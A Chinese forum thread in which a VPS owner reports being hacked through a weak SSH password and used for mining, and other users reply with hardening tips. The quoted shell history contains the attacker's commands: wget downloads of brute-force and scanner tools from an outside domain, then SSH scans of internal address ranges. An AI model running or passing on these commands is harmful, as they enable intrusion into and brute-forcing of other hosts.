一不小心被挖矿了

codger · 发表于 2023-12-24 10:05:21

防范意识薄弱，小鸡用的弱密码，没禁用密码登陆，今天登上机器看cpu100%，
马上意识到被挖矿了。看了下历史记录

sudo -i 133 exit 134 nproc 135 lscpu 136 exit 137 nproc 138 exit 139 nproc 140 ls 141 ip r 142 exit 143 wget david1337.dev/brute 144 wget david1337.dev/banner 145 wget david1337.dev/ps 146 chmod +x * 147 ip r 148 ./ps 10.42 22 149 ./ps 192.168 22 150 ./ps 172.17 22 151 ls 152 exit 153 lscpu 154 ls 155 exit 156 top 157 exit 158 clear 159 ls

复制代码

淦塔皮燕纸 david1337.dev

rewiner · 发表于 2023-12-24 10:06:09

拿到鸡第一步。修改密码，3种混合。修改22端口。开启bbr

julf · 发表于 2023-12-24 10:06:22

不放心还是重装了

灌水王 · 发表于 2023-12-24 10:06:53

第一步不就是禁密码登录改成密钥么，
密钥还更方便:lol

aa414350471 · 发表于 2023-12-24 10:07:30

端口只对白名单ip开放，稳得一比，你密码设置123都没问题:lol

灌水王 · 发表于 2023-12-24 10:08:09

这个矿工不专业，鞋套都不戴，差评

灌水王 · 发表于 2023-12-24 10:09:07

密钥，其他都是默认，dmit什么的开机就是密钥，更规范

xkcash · 发表于 2023-12-24 10:09:51

https://hostloc.com/thread-957070-1-1.html

* Linux常用命令：rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1'

* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc

灌水王 · 发表于 2023-12-24 10:10:00

三个脚本被删除了。楼主有备份吗发出来学习下

一不小心被挖矿了

本帖子中包含更多资源